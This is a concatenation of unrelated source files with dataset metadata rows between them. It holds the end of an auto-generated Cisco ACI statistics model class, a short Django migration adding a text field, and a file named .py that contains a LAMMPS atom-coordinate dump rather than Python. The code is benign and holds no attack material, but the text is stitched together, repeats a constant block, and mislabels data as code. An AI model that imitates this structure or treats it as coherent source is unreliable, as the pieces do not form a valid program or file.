prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pktsRateThr", prop)
prop = PropMeta("str", "pktsRateTr", "pktsRateTr", 31397, PropCategory.IMPLICIT_TREND)
prop.label = "ArpDropped Packets rate trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateTr", prop)
prop = PropMeta("str", "pktsRateTrBase", "pktsRateTrBase", 31396, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "ArpDropped Packets rate trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateTrBase", prop)
prop = PropMeta("str", "pktsRateTtl", "pktsRateTtl", 31394, PropCategory.IMPLICIT_TOTAL)
prop.label = "ArpDropped Packets rate total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateTtl", prop)
prop = PropMeta("str", "pktsSpct", "pktsSpct", 31375, PropCategory.IMPLICIT_SUSPECT)
prop.label = "ArpDropped Packets suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsSpct", prop)
prop = PropMeta("str", "pktsThr", "pktsThr", 31376, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "ArpDropped Packets thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pktsThr", prop)
prop = PropMeta("str", "pktsTr", "pktsTr", 31378, PropCategory.IMPLICIT_TREND)
prop.label = "ArpDropped Packets trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsTr", prop)
prop = PropMeta("str", "pktsTrBase", "pktsTrBase", 31377, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "ArpDropped Packets trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsTrBase", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("l1EthIfToEPg", "EPG", "cobra.model.fv.EPg"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"bkhoward@live.com"
] | bkhoward@live.com |
77bed12fb92ed9a4be75f7a3e3e79b0e4a1560f2 | 9ba2b89dbdeefa54c6b6935d772ce36be7b05292 | /devilry/devilry_group/migrations/0002_feedbackset_gradeform_json.py | 61b10f5028325b2b42f1b43c33e35c9c77ae6cf1 | [] | no_license | kristtuv/devilry-django | 0ffcd9d2005cad5e51f6377484a83d778d65050f | dd2a4e5a887b28268f3a45cc3b25a40c0e313fd3 | refs/heads/master | 2020-04-27T06:02:45.518765 | 2019-02-15T13:28:20 | 2019-02-15T13:28:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('devilry_group', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='feedbackset',
name='gradeform_json',
field=models.TextField(null=True, blank=True),
),
]
| [
"stianjul@gmail.com"
] | stianjul@gmail.com |
3ae711f77841ae1d7c0a636a8750ef11aeb7dd2f | 649bd422025e421d86025743eac324c9b882a2e8 | /exam/1_three-dimensional_atomic_system/dump/phasetrans/temp223_9000.py | dba8a0ab5453dc43f268323efdbd4e331fe24c86 | [] | no_license | scheuclu/atom_class | 36ddee1f6a5995872e858add151c5942c109847c | 0c9a8c63d9b38898c1869fe8983126cef17662cd | refs/heads/master | 2021-01-21T10:52:28.448221 | 2017-03-07T23:04:41 | 2017-03-07T23:04:41 | 83,489,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,732 | py | ITEM: TIMESTEP
9000
ITEM: NUMBER OF ATOMS
2048
ITEM: BOX BOUNDS pp pp pp
-1.7399323368011969e+02 2.2119323368016401e+02
-1.7399323368011969e+02 2.2119323368016401e+02
-1.7399323368011969e+02 2.2119323368016401e+02
ITEM: ATOMS id type xs ys zs
1879 1 0.460811 0.97243 0.0129587
1731 1 0.257982 0.0772842 0.0303815
640 1 0.345803 0.187254 0.0155385
535 1 0.300887 0.753809 0.0331833
1326 1 0.229303 0.381132 0.00397181
274 1 0.494065 0.355894 0.0273429
1787 1 0.0999422 0.630685 0.151452
137 1 0.147578 0.48977 0.00210796
983 1 0.424872 0.545005 0.0280916
744 1 0.0590379 0.807441 0.118354
1144 1 0.467476 0.421115 0.289152
1470 1 0.147492 0.0306706 0.464431
10 1 0.449234 0.663793 0.0400737
1902 1 0.0426606 0.979385 0.44723
592 1 0.0120205 0.354594 0.335644
1777 1 0.164457 0.947182 0.0854724
270 1 0.0605468 0.0514102 0.017359
1157 1 0.479288 0.139525 0.435463
1905 1 0.236518 0.0567451 0.0384331
1402 1 0.263481 0.116992 0.0241527
118 1 0.421104 0.120921 0.0589068
1792 1 0.146686 0.212045 0.0706084
1463 1 0.469182 0.532996 0.0116651
1390 1 0.37494 0.4079 0.0618037
326 1 0.0149861 0.530797 0.0682209
269 1 0.244427 0.52343 0.0471787
914 1 0.204302 0.457649 0.00550574
635 1 0.340515 0.528543 0.0463351
875 1 0.394629 0.244948 0.497266
477 1 0.149982 0.580428 0.00958573
1721 1 0.491135 0.152598 0.262286
467 1 0.194469 0.814765 0.0594622
1693 1 0.250099 0.921756 0.000269019
1643 1 0.0988496 0.886589 0.0136597
1933 1 0.16628 0.911072 0.0243858
1705 1 0.0785943 0.0961029 0.101791
1794 1 0.169166 0.162394 0.0777625
750 1 0.128688 0.251878 0.0186481
723 1 0.294541 0.432689 0.143881
1113 1 0.497737 0.352287 0.468753
761 1 0.00464433 0.738226 0.0644859
85 1 0.278353 0.522748 0.0968971
531 1 0.0333067 0.648764 0.104187
1991 1 0.497359 0.0720484 0.0718208
1166 1 0.17379 0.912859 0.00821741
281 1 0.327267 0.909881 0.0374856
846 1 0.433939 0.0441195 0.115
547 1 0.401691 0.0552682 0.061341
111 1 0.42599 0.113826 0.028104
1653 1 0.101195 0.12562 0.0430911
1336 1 0.271513 0.206497 0.0722432
1769 1 0.254235 0.195574 0.0507211
455 1 0.111628 0.485065 0.079565
609 1 0.417426 0.482783 0.0613399
593 1 0.473262 0.504489 0.0810626
53 1 0.120108 0.569959 0.0895392
751 1 0.402967 0.60804 0.109381
1235 1 0.220409 0.604315 0.0396395
556 1 0.136246 0.637512 0.135935
504 1 0.408592 0.699565 0.140156
247 1 0.303876 0.637615 0.0720888
1192 1 0.154298 0.778986 0.113237
927 1 0.204893 0.755049 0.0543257
843 1 0.426585 0.724908 0.0286864
412 1 0.0272361 0.830143 0.0435978
1130 1 0.0837254 0.886542 0.0533688
329 1 0.127266 0.895871 0.0915247
363 1 0.196009 0.998386 0.0651115
1410 1 0.354087 0.96774 0.0631596
2007 1 0.328873 0.0511941 0.0614525
2020 1 0.175924 0.874578 0.0413618
286 1 0.334971 0.139784 0.0605486
1921 1 0.396777 0.198617 0.0745315
1739 1 0.211912 0.474144 0.0915819
1972 1 0.0421847 0.511235 0.0653837
819 1 0.430911 0.658183 0.0031257
1255 1 0.268811 0.61475 0.0763736
847 1 0.150419 0.859824 0.119958
828 1 0.145757 0.105908 0.125015
57 1 0.252661 0.0417618 0.145794
935 1 0.0613449 0.366338 0.2974
1736 1 0.140288 0.10321 0.0721049
523 1 0.368268 0.120762 0.125353
349 1 0.287036 0.199538 0.0987159
999 1 0.111888 0.204367 0.121103
1041 1 0.144106 0.227221 0.106075
367 1 0.39423 0.251122 0.0957009
990 1 0.220114 0.532236 0.146679
75 1 0.203916 0.619211 0.148254
2039 1 0.228956 0.600568 0.108192
598 1 0.337098 0.581976 0.179691
1752 1 0.212564 0.617934 0.0595027
1010 1 0.215608 0.953508 0.0631212
1423 1 0.173915 0.886005 0.0735061
1456 1 0.167978 0.990925 0.0999368
131 1 0.291659 0.00478229 0.118307
1814 1 0.414588 0.059507 0.124688
934 1 0.455809 0.207045 0.134106
54 1 0.307814 0.25446 0.111489
1171 1 0.341195 0.243955 0.0963918
296 1 0.166804 0.231513 0.0628734
1989 1 0.142834 0.397744 0.046422
1409 1 0.475692 0.362798 0.121996
979 1 0.296771 0.381821 0.16531
1801 1 0.243038 0.684659 0.127236
803 1 0.0375468 0.79897 0.109506
1068 1 0.0280234 0.694137 0.102039
588 1 0.103332 0.859955 0.131069
246 1 0.322039 0.783471 0.154622
1791 1 0.476717 0.763361 0.0766634
1591 1 0.0351221 0.902629 0.13908
732 1 0.496 0.990014 0.154849
1419 1 0.0298796 0.104531 0.113718
283 1 0.350608 0.0610425 0.152123
801 1 0.489552 0.103231 0.0614007
1603 1 0.49165 0.104771 0.234279
64 1 0.278049 0.167731 0.116236
337 1 0.218591 0.203511 0.161717
1948 1 0.245367 0.211708 0.100104
1198 1 0.16051 0.247058 0.0681249
1361 1 0.254438 0.368092 0.115033
696 1 0.232523 0.277282 0.0839882
1857 1 0.00201156 0.482902 0.0353738
804 1 0.384874 0.512454 0.187665
1934 1 0.181855 0.587681 0.122881
898 1 0.210055 0.660108 0.11797
1064 1 0.382512 0.701997 0.183554
1621 1 0.082407 0.710436 0.152963
1802 1 0.463799 0.234425 0.195155
890 1 0.187914 0.725909 0.184372
799 1 0.474491 0.828521 0.11849
510 1 0.257146 0.789809 0.137138
2003 1 0.223705 0.0650647 0.123883
742 1 0.20257 0.0374835 0.136775
827 1 0.486963 0.217917 0.123717
335 1 0.462276 0.249636 0.195458
312 1 0.204236 0.328121 0.139798
1009 1 0.475361 0.438649 0.173553
393 1 0.483151 0.411695 0.428994
519 1 0.0354957 0.492201 0.0190766
978 1 0.278371 0.514994 0.132794
128 1 0.0213043 0.605929 0.135764
1576 1 0.260636 0.70597 0.131173
1427 1 0.0975198 0.656824 0.149725
1069 1 0.496016 0.705775 0.137107
1774 1 0.350197 0.760013 0.108357
141 1 0.0230141 0.78496 0.161063
1372 1 0.357193 0.911054 0.197259
1049 1 0.125809 0.478266 0.494018
90 1 0.410185 0.980213 0.183606
1751 1 0.408538 0.948124 0.136416
959 1 0.25435 0.101926 0.123472
1892 1 0.448123 0.246452 0.167684
1983 1 0.172614 0.226847 0.235196
1713 1 0.362758 0.245354 0.16963
1755 1 0.219536 0.307502 0.13533
697 1 0.0135356 0.382243 0.141607
458 1 0.192553 0.412154 0.214511
301 1 0.0251029 0.472135 0.123782
1287 1 0.410446 0.430317 0.168993
38 1 0.326204 0.633668 0.240914
1734 1 0.374546 0.828339 0.177965
1770 1 0.143631 0.887897 0.154348
517 1 0.4054 0.897168 0.159219
436 1 0.416867 0.987691 0.105251
1240 1 0.171831 0.397068 0.192128
1360 1 0.0948884 0.42662 0.146298
1611 1 0.307309 0.604503 0.210533
1635 1 0.387262 0.612676 0.222202
633 1 0.149991 0.744744 0.181948
1048 1 0.31072 0.768774 0.159634
783 1 0.24499 0.761594 0.167123
386 1 0.412469 0.843845 0.174269
1695 1 0.252071 0.908955 0.154697
407 1 0.178746 0.872275 0.183631
730 1 0.255282 0.935206 0.213184
639 1 0.339017 0.978591 0.200072
354 1 0.410292 0.00483246 0.16236
115 1 0.0726209 0.132155 0.219405
136 1 0.0842741 0.162517 0.172557
1907 1 0.362979 0.162882 0.155634
1288 1 0.210589 0.292768 0.21484
1687 1 0.45758 0.31806 0.232389
1730 1 0.201031 0.439812 0.239022
380 1 0.417228 0.363969 0.16714
1499 1 0.191648 0.520881 0.263399
1555 1 0.194606 0.412275 0.168027
551 1 0.197013 0.460066 0.142363
177 1 0.455964 0.569171 0.188354
212 1 0.419295 0.594004 0.175483
2043 1 0.104028 0.788164 0.226802
224 1 0.0305296 0.580287 0.0483228
945 1 0.365197 0.0721687 0.273144
1475 1 0.0716654 0.268657 0.220978
1376 1 0.265758 0.391921 0.195865
414 1 0.0733191 0.439118 0.210596
1061 1 0.303217 0.523671 0.289684
622 1 0.0303368 0.514135 0.267006
865 1 0.110945 0.57733 0.227807
686 1 0.372595 0.624716 0.217591
638 1 0.402446 0.629599 0.159869
1901 1 0.126168 0.721607 0.275107
439 1 0.399628 0.7958 0.28393
1459 1 0.0586382 0.708517 0.271443
623 1 0.070772 0.0457597 0.227425
1448 1 0.481714 0.0542218 0.274377
532 1 0.383734 0.130027 0.219777
52 1 0.370191 0.210011 0.196736
41 1 0.0101612 0.412566 0.235495
1548 1 0.442888 0.437633 0.220393
904 1 0.332107 0.500717 0.210143
1051 1 0.0201901 0.632153 0.266555
1835 1 0.139841 0.58549 0.232966
838 1 0.0862027 0.673752 0.248271
806 1 0.0540841 0.835922 0.259874
411 1 0.136266 0.789767 0.230342
1903 1 0.428903 0.94145 0.205563
1891 1 0.359578 0.00906107 0.270602
1387 1 0.26934 0.907592 0.226006
80 1 0.157184 0.045788 0.237238
710 1 0.381109 0.0959277 0.285456
1937 1 0.0404846 0.9277 0.250232
25 1 0.068248 0.149948 0.25696
384 1 0.167475 0.245264 0.285823
1685 1 0.252031 0.242209 0.325189
1117 1 0.317416 0.282394 0.232111
1897 1 0.156388 0.248787 0.25986
434 1 0.281391 0.307975 0.228283
1276 1 0.192113 0.391867 0.3052
1225 1 0.455947 0.378534 0.253817
1804 1 0.0269152 0.550257 0.188152
682 1 0.0685354 0.562819 0.250378
9 1 0.213665 0.609629 0.246597
1370 1 0.453537 0.640311 0.239554
1004 1 0.00899983 0.800977 0.373373
899 1 0.204944 0.713766 0.235291
1938 1 0.189402 0.713122 0.296495
1620 1 0.398575 0.72798 0.254959
399 1 0.189968 0.862042 0.331298
911 1 0.233506 0.804582 0.303305
1303 1 0.280828 0.844608 0.221001
1232 1 0.294169 0.0455183 0.315117
1500 1 0.389913 0.179908 0.289597
336 1 0.0526601 0.209331 0.288247
918 1 0.499212 0.266768 0.312688
1135 1 0.196374 0.301399 0.31905
1723 1 0.421108 0.392077 0.296091
1152 1 0.478835 0.291972 0.339199
358 1 0.175579 0.436065 0.268415
1613 1 0.368394 0.452212 0.368237
1652 1 0.184324 0.499877 0.293167
661 1 0.242499 0.467903 0.271274
1464 1 0.315062 0.479907 0.259542
648 1 0.300466 0.527824 0.315741
1862 1 0.434984 0.606773 0.236305
1168 1 0.0505286 0.68446 0.299506
1091 1 0.128732 0.683501 0.219249
540 1 0.469548 0.70414 0.29227
92 1 0.0314395 0.762656 0.258411
735 1 0.00458943 0.221658 0.0717067
1553 1 0.135424 0.734383 0.262607
351 1 0.467844 0.712852 0.496551
1545 1 0.416739 0.810721 0.245969
213 1 0.150471 0.965053 0.250676
1309 1 0.3084 0.0392873 0.227226
1898 1 0.477694 0.27051 0.00267658
917 1 0.0858888 0.10184 0.281827
165 1 0.0167119 0.0802055 0.344821
991 1 0.392318 0.202197 0.232912
625 1 0.199317 0.233438 0.319547
473 1 0.430141 0.236754 0.282995
377 1 0.471786 0.36224 0.250058
144 1 0.325587 0.503512 0.254639
745 1 0.0301458 0.53519 0.317905
1870 1 0.0301738 0.623332 0.314813
775 1 0.164105 0.569984 0.319441
1104 1 0.420935 0.678022 0.312439
1 1 0.169923 0.762261 0.292211
1452 1 0.332274 0.811604 0.260945
282 1 0.0758049 0.874241 0.30772
786 1 0.432476 0.899696 0.308981
1845 1 0.384973 0.986684 0.262145
429 1 0.391965 0.910146 0.244719
1668 1 0.248589 0.15718 0.299814
388 1 0.0292265 0.193507 0.314691
823 1 0.0206969 0.231179 0.262366
345 1 0.185067 0.342163 0.328951
1142 1 0.217287 0.425557 0.333946
550 1 0.262992 0.48466 0.0182318
265 1 0.179771 0.565952 0.340109
316 1 0.148036 0.594855 0.286328
906 1 0.395852 0.559434 0.315701
1610 1 0.0154996 0.640297 0.303827
624 1 0.405902 0.669195 0.295556
1378 1 0.439568 0.641965 0.296134
2029 1 0.0365666 0.733523 0.301341
1985 1 0.286746 0.756477 0.2749
16 1 0.0252568 0.669262 0.310986
107 1 0.379702 0.744755 0.366493
1957 1 0.0413425 0.982436 0.338
19 1 0.341457 0.978368 0.335995
1028 1 0.023804 0.982234 0.332377
687 1 0.48182 0.987811 0.359417
1417 1 3.05626e-06 0.199417 0.299685
1241 1 0.218988 0.240822 0.328148
44 1 0.476119 0.706563 0.12492
614 1 0.355685 0.302601 0.302335
1785 1 0.0319365 0.30934 0.398108
1820 1 0.0384968 0.312576 0.392003
1925 1 0.157534 0.486324 0.313948
1454 1 0.16618 0.474551 0.306635
689 1 0.0491713 0.462788 0.315865
1421 1 0.11062 0.478041 0.378147
37 1 0.0442659 0.610449 0.296286
1675 1 0.354852 0.608745 0.35683
452 1 0.395863 0.667026 0.34676
1149 1 0.151581 0.746402 0.328973
1626 1 0.0278542 0.598071 0.371504
1290 1 0.294184 0.113498 0.387153
731 1 0.25763 0.163815 0.424568
1012 1 0.401722 0.165685 0.356425
563 1 0.475337 0.270842 0.350199
471 1 0.244811 0.336756 0.371957
1474 1 0.345977 0.338868 0.318243
736 1 0.479147 0.342823 0.291617
330 1 0.335958 0.331053 0.322762
1060 1 0.367552 0.462594 0.38269
1330 1 0.364133 0.572966 0.325259
989 1 0.205399 0.558073 0.37647
1003 1 0.0917776 0.567173 0.311528
1267 1 0.468397 0.750434 0.382602
589 1 0.355575 0.777656 0.411985
739 1 0.11361 0.88466 0.331768
971 1 0.429584 0.0695142 0.309158
1436 1 0.39449 0.241376 0.265252
43 1 0.409235 0.218622 0.318956
1045 1 0.100175 0.344368 0.38175
1679 1 0.348165 0.396903 0.349897
1258 1 0.434341 0.548779 0.335624
1014 1 0.280162 0.460968 0.347286
373 1 0.356559 0.592456 0.424358
7 1 0.223046 0.58095 0.342753
474 1 0.476287 0.820923 0.300868
1200 1 0.130121 0.620873 0.385992
1189 1 0.277889 0.581689 0.461306
1954 1 0.246432 0.623951 0.326294
334 1 0.275899 0.596946 0.375267
912 1 0.427773 0.637893 0.383085
1961 1 0.396055 0.612736 0.380795
724 1 0.38041 0.626966 0.313744
599 1 0.20599 0.634341 0.331199
1684 1 0.469134 0.694236 0.348259
1206 1 0.234975 0.785005 0.450621
324 1 0.192032 0.927934 0.356178
976 1 0.435436 0.0530023 0.326717
1598 1 0.472651 0.639495 0.0463557
953 1 0.0700598 0.097351 0.361457
133 1 0.417237 0.210971 0.383511
1248 1 0.200073 0.263546 0.402211
1366 1 0.242371 0.321279 0.396918
1266 1 0.303009 0.379062 0.407965
1254 1 0.262901 0.208853 0.00427637
946 1 0.0628226 0.614116 0.375636
258 1 0.492975 0.619727 0.419579
1706 1 0.424946 0.631767 0.411602
1503 1 0.0452291 0.719016 0.413476
82 1 0.370393 0.653753 0.413684
1838 1 0.493014 0.0271013 0.331531
1401 1 0.283916 0.881683 0.337942
1681 1 0.118429 0.870164 0.377669
872 1 0.132866 0.851729 0.342345
1087 1 0.111023 0.877425 0.377683
1016 1 0.2168 0.935225 0.370311
1277 1 0.325718 0.00672681 0.327463
1451 1 0.148104 0.0957204 0.372592
1710 1 0.0811612 0.0984651 0.406709
1876 1 0.0900272 0.315791 0.418964
856 1 0.288224 0.312313 0.394234
881 1 0.253817 0.348449 0.472624
120 1 0.298555 0.300556 0.399371
1438 1 0.450053 0.359121 0.391934
1931 1 0.246665 0.535203 0.382076
1365 1 0.400138 0.566565 0.373528
859 1 0.370345 0.584831 0.339064
1146 1 0.266274 0.605926 0.433999
855 1 0.433001 0.679303 0.402795
1651 1 0.123911 0.670658 0.406697
1496 1 0.450104 0.709634 0.363823
478 1 0.347141 0.753975 0.435126
104 1 0.0673676 0.746821 0.426909
182 1 0.473575 0.083692 0.133106
1193 1 0.441612 0.783816 0.461135
1302 1 0.390232 0.841942 0.36799
31 1 0.0767624 0.826774 0.485927
262 1 0.329054 0.865054 0.435712
1052 1 0.301655 0.900308 0.393007
1406 1 0.331333 0.845576 0.346242
1701 1 0.273964 0.992659 0.444049
660 1 0.321341 0.0610026 0.459119
829 1 0.358021 0.0491765 0.419241
2041 1 0.099539 0.191541 0.410223
381 1 0.196661 0.162413 0.480581
1222 1 0.10542 0.193055 0.432297
1833 1 0.0911186 0.256984 0.440255
512 1 0.319694 0.306157 0.435844
416 1 0.479036 0.336904 0.431982
378 1 0.495191 0.486943 0.358213
207 1 0.250317 0.428642 0.40325
223 1 0.00994319 0.389766 0.369393
1772 1 0.235767 0.698162 0.374621
1328 1 0.287111 0.640747 0.459785
222 1 0.0696922 0.708902 0.457999
1756 1 0.147388 0.764764 0.342701
45 1 0.0967312 0.819359 0.432303
1099 1 0.0806426 0.917562 0.403719
1273 1 0.340343 0.851331 0.430257
505 1 0.384616 0.969322 0.409269
1005 1 0.388406 0.970895 0.381974
972 1 0.425313 0.0035767 0.423406
1382 1 0.0438197 0.0933111 0.468718
1807 1 0.254264 0.107205 0.487406
816 1 0.100685 0.143666 0.42238
950 1 0.42125 0.16522 0.463431
143 1 0.0303975 0.177395 0.418736
869 1 0.159302 0.218041 0.416917
1211 1 0.385255 0.36292 0.424539
1511 1 0.0818737 0.320923 0.464076
1778 1 0.358755 0.420669 0.484179
668 1 0.467795 0.335344 0.437762
1573 1 0.319206 0.488987 0.448963
1973 1 0.329568 0.482529 0.46113
996 1 0.0973354 0.459029 0.419228
468 1 0.407527 0.462237 0.454089
1363 1 0.470806 0.52662 0.457229
1407 1 0.0465348 0.639683 0.468311
124 1 0.19003 0.782176 0.420518
1073 1 0.188445 0.715633 0.406874
1327 1 0.49824 0.945584 0.0449227
372 1 0.422291 0.995216 0.443966
2000 1 0.210524 0.111494 0.45308
371 1 0.320445 0.118179 0.477676
1289 1 0.316083 0.166092 0.472498
109 1 0.25292 0.195628 0.439953
1185 1 0.168952 0.196686 0.4488
1860 1 0.0129194 0.228778 0.403501
1763 1 0.142834 0.482818 0.437505
1163 1 0.412964 0.480989 0.452352
595 1 0.384448 0.498288 0.398649
684 1 0.241682 0.141203 0.0137176
307 1 0.408225 0.678387 0.414477
702 1 0.21141 0.798901 0.44521
1393 1 0.0820524 0.126792 0.467176
15 1 0.144607 0.94488 0.492375
1963 1 0.120846 0.245938 0.474675
794 1 0.111424 0.197367 0.470655
631 1 0.480748 0.0132546 0.034003
1044 1 0.459541 0.311133 0.48398
666 1 0.153549 0.438427 0.491716
192 1 0.481313 0.327725 0.409381
1011 1 0.0235655 0.292214 0.308389
600 1 0.10425 0.747197 0.0290785
621 1 0.484275 0.884174 0.00901414
1383 1 0.225147 0.77953 0.466646
833 1 0.240609 0.182061 0.00589966
1283 1 0.318839 0.764083 0.451554
1968 1 0.463627 0.798795 0.488424
849 1 0.156704 0.910919 0.478252
1886 1 0.274323 0.917244 0.41965
1935 1 0.349093 0.938071 0.465272
110 1 0.0173793 0.674093 0.317185
670 1 0.16612 0.190193 0.424589
453 1 0.40823 0.185041 0.485556
2044 1 0.03883 0.978838 0.490595
148 1 0.261807 0.333556 0.0137695
818 1 0.358729 0.290023 0.448267
